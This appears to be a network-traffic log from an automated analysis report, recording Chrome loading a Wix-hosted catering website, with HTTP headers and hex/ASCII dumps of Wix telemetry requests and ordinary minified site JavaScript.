                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC641OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 1807
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1807OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 22 3a 22 76 69 73 69 62 6c 65 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 22 3a 22 53 54 41 52 54 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 34 64 36 66 38 38 39 61 2d 64 37 35 64 2d 34 32 31 36
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","transactionName":"visible","transactionAction":"START","sessionId":"4d6f889a-d75d-4216
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC866INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:53:13 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        x-seen-by: jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLrKlzeGrau08OveYR7mXfKeWWveFEnegpnkLxzZh8fhS,rXUceJIlvIg2Ftogbhjv0G3xLjYROWRJ9bi2rMcys5FEQfi00LSS7LJu7sdkoLsDS/+71SM/Ln9B2bFMELB+XA==,r6yY0ta7bIKrqK70x072lVi410Qog3/QVTGI4+RVzLg=,bOnBQDOCjWxRPsoIciwTIbOJYkhs846jRFk9TIBbQ+F44YZA4ert2GF8oL/WunneLBh+ZXBkvoZSc9Md0w0ciA==
                                                                                                                                                                                                                        x-wix-request-id: 1736517193.6795618813097921203469
                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        136192.168.2.55009734.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC406OUTGET /services/wix-thunderbolt/dist/group_11.ffa65b2d.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1217
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: _aNNA78h67gJslsnqdgAOTL8G__jl7rs
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 398431369 402394836
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 654091246
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273553
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:48:57 GMT
                                                                                                                                                                                                                        ETag: "15bae755a94c8e4fedc748581ee318de"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 37 37 5d 2c 7b 32 34 33 30 39 3a 28 61 2c 65 2c 6e 29 3d 3e 7b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 70 61 67 65 3a 28 29 3d 3e 6d 7d 29 3b 76 61 72 20 73 3d 6e 28 31 36 35 33 37 29 2c 74 3d 6e 28 37 37 37 34 38 29 2c 6c 3d 6e 28 38 37 37 31 31 29 2c 6f 3d 6e 28 32 30 35 39 30 29 2c 67 3d 6e 28 33 39 32 31 38 29 2c 69 3d 6e 28 31 30 35 35 33 29 2c 75 3d 6e 28
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[2177],{24309:(a,e,n)=>{n.r(e),n.d(e,{page:()=>m});var s=n(16537),t=n(77748),l=n(87711),o=n(20590),g=n(39218),i=n(10553),u=n(
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC989INData Raw: 37 33 31 35 37 29 2c 70 3d 6e 28 34 35 31 31 37 29 3b 63 6f 6e 73 74 20 72 3d 22 6c 61 6e 64 69 6e 67 50 61 67 65 22 2c 63 3d 28 30 2c 74 2e 4f 67 29 28 5b 6c 2e 4a 69 5d 2c 28 61 3d 3e 7b 63 6f 6e 73 74 20 65 3d 28 29 3d 3e 28 61 2e 67 65 74 28 22 6d 61 73 74 65 72 50 61 67 65 22 29 7c 7c 7b 7d 29 2e 63 6c 61 73 73 4e 61 6d 65 73 7c 7c 7b 7d 2c 6e 3d 65 3d 3e 7b 61 2e 75 70 64 61 74 65 28 7b 6d 61 73 74 65 72 50 61 67 65 3a 7b 63 6c 61 73 73 4e 61 6d 65 73 3a 65 7d 7d 29 7d 2c 73 3d 61 3d 3e 7b 63 6f 6e 73 74 20 65 3d 7b 2e 2e 2e 61 7d 3b 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 65 5b 72 5d 2c 65 7d 3b 72 65 74 75 72 6e 7b 61 73 79 6e 63 20 75 70 64 61 74 65 43 6c 61 73 73 4e 61 6d 65 73 4f 6e 50 61 67 65 57 69 6c 6c 4d 6f 75 6e 74 28 61 29 7b 63 6f 6e
                                                                                                                                                                                                                        Data Ascii: 73157),p=n(45117);const r="landingPage",c=(0,t.Og)([l.Ji],(a=>{const e=()=>(a.get("masterPage")||{}).classNames||{},n=e=>{a.update({masterPage:{classNames:e}})},s=a=>{const e={...a};return delete e[r],e};return{async updateClassNamesOnPageWillMount(a){con


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        137192.168.2.55009834.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC406OUTGET /services/wix-thunderbolt/dist/group_32.ca7bb96a.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 4490
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: roHeF26Qb.cix0WxZDrD2uoZ.ampRFi6
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 349589233 291163544
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 714282274
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 10:26:52 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 271581
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 10:22:26 GMT
                                                                                                                                                                                                                        ETag: "444f7a86b5ad059a20281c7562749f99"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 39 30 38 5d 2c 7b 31 33 33 39 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 53 79 6d 62 6f 6c 3a 28 29 3d 3e 72 2e 65 24 2c 65 64 69 74 6f 72 3a 28 29 3d 3e 76 2c 65 64 69 74 6f 72 50 61 67 65 3a 28 29 3d 3e 68 2c 70 61 67 65 3a 28 29 3d 3e 5f 7d 29 3b 76 61 72 20 6f 3d 6e 28 37 37 37 34 38
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[8908],{13396:(e,t,n)=>{n.r(t),n.d(t,{PageTransitionsSymbol:()=>r.e$,editor:()=>v,editorPage:()=>h,page:()=>_});var o=n(77748
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 29 2c 69 3d 6e 28 32 30 35 39 30 29 2c 73 3d 6e 28 33 39 32 31 38 29 2c 61 3d 6e 28 33 32 31 36 36 29 2c 72 3d 6e 28 38 36 30 34 36 29 2c 64 3d 6e 28 34 31 35 39 36 29 3b 63 6f 6e 73 74 20 6c 3d 28 30 2c 6f 2e 4f 67 29 28 5b 28 30 2c 6f 2e 4b 54 29 28 69 2e 47 70 2c 72 2e 55 55 29 2c 28 30 2c 6f 2e 4b 54 29 28 69 2e 77 6b 2c 72 2e 55 55 29 2c 73 2e 64 42 2c 64 2e 73 2c 61 2e 52 56 5d 2c 28 28 65 2c 74 2c 6e 2c 6f 2c 69 29 3d 3e 7b 63 6f 6e 73 74 20 73 3d 21 21 69 26 26 22 73 74 61 72 74 56 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 22 69 6e 20 69 2e 64 6f 63 75 6d 65 6e 74 26 26 65 2e 73 68 6f 75 6c 64 55 73 65 56 69 65 77 54 72 61 6e 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 22 70 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 70 61 67 65 44
                                                                                                                                                                                                                        Data Ascii: ),i=n(20590),s=n(39218),a=n(32166),r=n(86046),d=n(41596);const l=(0,o.Og)([(0,o.KT)(i.Gp,r.UU),(0,o.KT)(i.wk,r.UU),s.dB,d.s,a.RV],((e,t,n,o,i)=>{const s=!!i&&"startViewTransition"in i.document&&e.shouldUseViewTransition;return{name:"pageTransitions",pageD
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 47 70 2c 72 2e 55 55 29 5d 2c 28 65 3d 3e 7b 6c 65 74 20 74 3d 5b 5d 3b 72 65 74 75 72 6e 7b 68 61 73 54 72 61 6e 73 69 74 69 6f 6e 3a 22 6e 6f 6e 65 22 21 3d 3d 65 2e 74 72 61 6e 73 69 74 69 6f 6e 4e 61 6d 65 2c 6f 6e 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 43 6f 6d 70 6c 65 74 65 64 3a 65 3d 3e 7b 74 2e 70 75 73 68 28 65 29 7d 2c 6e 6f 74 69 66 79 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 43 6f 6d 70 6c 65 74 65 64 3a 65 3d 3e 7b 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 74 28 65 29 29 29 2c 74 3d 5b 5d 7d 7d 7d 29 29 3b 76 61 72 20 75 3d 6e 28 31 36 35 33 37 29 2c 67 3d 6e 28 32 30 36 33 36 29 2c 6d 3d 6e 28 38 37 37 31 31 29 3b 63 6f 6e 73 74 20 54 3d 28 30 2c 6f 2e 4f 67 29 28 5b 28 30 2c 6f 2e 4b 54 29 28 69 2e 47 70 2c 72 2e 55 55 29 2c 6d
                                                                                                                                                                                                                        Data Ascii: Gp,r.UU)],(e=>{let t=[];return{hasTransition:"none"!==e.transitionName,onPageTransitionsCompleted:e=>{t.push(e)},notifyPageTransitionsCompleted:e=>{t.forEach((t=>t(e))),t=[]}}}));var u=n(16537),g=n(20636),m=n(87711);const T=(0,o.Og)([(0,o.KT)(i.Gp,r.UU),m
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 29 3d 3e 7b 6e 2e 75 70 64 61 74 65 28 28 74 3d 3e 28 7b 2e 2e 2e 74 2c 70 61 67 65 42 61 63 6b 67 72 6f 75 6e 64 50 72 6f 70 3a 69 2c 70 61 67 65 42 61 63 6b 67 72 6f 75 6e 64 3a 65 2e 70 61 67 65 42 61 63 6b 67 72 6f 75 6e 64 7d 29 29 29 3b 63 6f 6e 73 74 20 61 3d 28 6e 2e 67 65 74 28 29 3f 2e 6e 65 78 74 54 72 61 6e 73 69 74 69 6f 6e 45 6e 61 62 6c 65 64 3f 3f 21 30 29 26 26 73 3b 74 2e 75 70 64 61 74 65 28 7b 42 41 43 4b 47 52 4f 55 4e 44 5f 47 52 4f 55 50 3a 7b 6b 65 79 3a 60 42 41 43 4b 47 52 4f 55 4e 44 5f 47 52 4f 55 50 5f 24 7b 65 2e 76 69 65 77 4d 6f 64 65 7d 60 2c 74 72 61 6e 73 69 74 69 6f 6e 45 6e 61 62 6c 65 64 3a 61 2c 63 6c 61 73 73 4e 61 6d 65 3a 60 62 61 63 6b 67 72 6f 75 6e 64 47 72 6f 75 70 5f 24 7b 6f 7d 60 7d 7d 29 7d 2c 6c 3d 74 3d
                                                                                                                                                                                                                        Data Ascii: )=>{n.update((t=>({...t,pageBackgroundProp:i,pageBackground:e.pageBackground})));const a=(n.get()?.nextTransitionEnabled??!0)&&s;t.update({BACKGROUND_GROUP:{key:`BACKGROUND_GROUP_${e.viewMode}`,transitionEnabled:a,className:`backgroundGroup_${o}`}})},l=t=
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC92INData Raw: 70 73 3a 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 2f 64 69 73 74 2f 67 72 6f 75 70 5f 33 32 2e 63 61 37 62 62 39 36 61 2e 63 68 75 6e 6b 2e 6d 69 6e 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                        Data Ascii: ps://static.parastorage.com/services/wix-thunderbolt/dist/group_32.ca7bb96a.chunk.min.js.map


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        138192.168.2.5501003.234.186.1414435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1214OUTPOST /bt?src=29&evid=3&viewer_name=thunderbolt&caching=hit,hit_miss&dc=virginia-pub&microPop=fastly_virginia-pub_g&et=33&event_name=page%20interactive&is_cached=true&is_platform_loaded=0&is_rollout=1&ism=1&isp=0&isjp=false&iss=1&ita=0&msid=8fc1138c-79b4-4e29-bbc0-d551c6ca71af&pid=rovl3&pn=1&sar=1280x984&sessionId=609f0441-2d8c-4646-846e-278b54a8f519&siterev=11-__siteCacheRevision__&sr=1280x1024&st=2&ts=37417&tts=38959&url=https%3A%2F%2Fwww.samantacatering.com%2F&v=1.15031.0&vid=8d649337-89cd-48d4-9939-17d1e0829884&bsi=153dfd08-7420-4371-86fb-5d02f7e531d5|1&vsi=4d6f889a-d75d-4216-a25e-a2eb4ad3a234&wor=1280x984&wr=1280x907&_brandId=wix HTTP/1.1
                                                                                                                                                                                                                        Host: frog.wix.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:13 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        139192.168.2.55010234.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC643OUTGET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[SkipToContentButton].69abe737.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 2925
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: xMCS0H8fbbvhdMo6I17HZ75DQOCAahX3
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 1005811370
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 14:33:10 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 1812003
                                                                                                                                                                                                                        Last-Modified: Fri, 20 Dec 2024 14:09:34 GMT
                                                                                                                                                                                                                        ETag: "d98a47b19810ffa91d973921f80de69b"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC258INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5b 53 6b 69 70 54 6f 43 6f 6e 74 65 6e 74 42 75 74 74 6f 6e 5d 22 2c 5b 22 72 65 61 63 74 22 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c
                                                                                                                                                                                                                        Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt[SkipToContentButton]",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbol
